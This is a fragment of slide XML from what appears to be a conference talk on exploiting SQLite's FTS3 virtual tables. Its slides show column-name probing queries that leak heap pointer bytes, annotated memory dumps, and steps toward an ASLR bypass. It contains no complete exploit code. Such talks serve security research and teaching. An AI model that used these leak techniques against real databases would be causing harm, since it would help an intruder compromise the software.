              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="3854031"/>
            <a:ext cx="387348" cy="1"/>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00 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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46694"/>
            <a:ext cx="606717" cy="19723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610591595"/>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513751" y="3530865"/>
            <a:ext cx="3566249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT BBBB… from table2100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BBB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="3854031"/>
            <a:ext cx="387348" cy="1"/>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00 20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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46694"/>
            <a:ext cx="606717" cy="19723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 name="Curved Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="48" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5467349" y="968993"/>
            <a:ext cx="68117" cy="2876318"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 761029"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="222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2213673"/>
      </p:ext>
    </p:extLst>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513751" y="3530865"/>
            <a:ext cx="3566249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT BBBB… from table2100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BBB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="3854031"/>
            <a:ext cx="387348" cy="1"/>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00 30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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46694"/>
            <a:ext cx="606717" cy="19723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 name="Curved Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5467353" y="3424239"/>
            <a:ext cx="68113" cy="421073"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 476300"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="222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2060701"/>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513751" y="3530865"/>
            <a:ext cx="3566249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT BBBB… from table2100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uccess</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="3854031"/>
            <a:ext cx="387348" cy="1"/>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00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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46694"/>
            <a:ext cx="606717" cy="19723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5" name="Curved Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5467349" y="3858814"/>
            <a:ext cx="68117" cy="2091753"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 761029"/>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2887527"/>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00 40 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>54</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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46694"/>
            <a:ext cx="929990" cy="19723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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513751" y="3530865"/>
            <a:ext cx="3566249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SELECT BBBB… from table2100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uccess</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="3854031"/>
            <a:ext cx="387348" cy="1"/>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7" name="Curved Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5467349" y="3858814"/>
            <a:ext cx="68117" cy="2091753"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 761029"/>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824945"/>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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507976" y="3526974"/>
            <a:ext cx="3566249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The 3 least significant bytes are leaked! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074225" y="3842266"/>
            <a:ext cx="393123" cy="0"/>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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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5465" y="3746694"/>
            <a:ext cx="929990" cy="19723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3932035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Shadow Tables</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="707804624"/>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72401" y="2801711"/>
            <a:ext cx="3460491" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stage 9</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2807" y="683851"/>
            <a:ext cx="5483684" cy="5483684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2357843887"/>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10 21 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 00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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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30 21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20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40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532265" y="4909961"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Fts3 Virtual Table Object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="5094627"/>
            <a:ext cx="275824" cy="3849"/>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32265" y="3166625"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0x1000 sized Column Name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="3351291"/>
            <a:ext cx="275824" cy="3849"/>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532265" y="1059771"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Column object array</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191524" y="1244437"/>
            <a:ext cx="275824" cy="3849"/>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8181586" y="5325627"/>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290808160"/>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10 21 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 00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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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30 21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20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40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526589" y="4771461"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5512087" y="4593686"/>
            <a:ext cx="2650837" cy="242247"/>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7" name="Curved Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="1"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5185849" y="4714809"/>
            <a:ext cx="326239" cy="241317"/>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2662762"/>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10 21 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 00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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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30 21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20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40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8174275" y="4833258"/>
            <a:ext cx="2650837" cy="242247"/>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TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526589" y="4771461"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Curved Connector 4"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="1"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5185849" y="4954381"/>
            <a:ext cx="2988427" cy="1745"/>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2621907"/>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10 21 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 00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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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rgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>30 21 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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20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40 BA B1 20 C3 21 00 00 A0 2F B1 20 C3 21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22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526589" y="4771461"/>
            <a:ext cx="3659259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
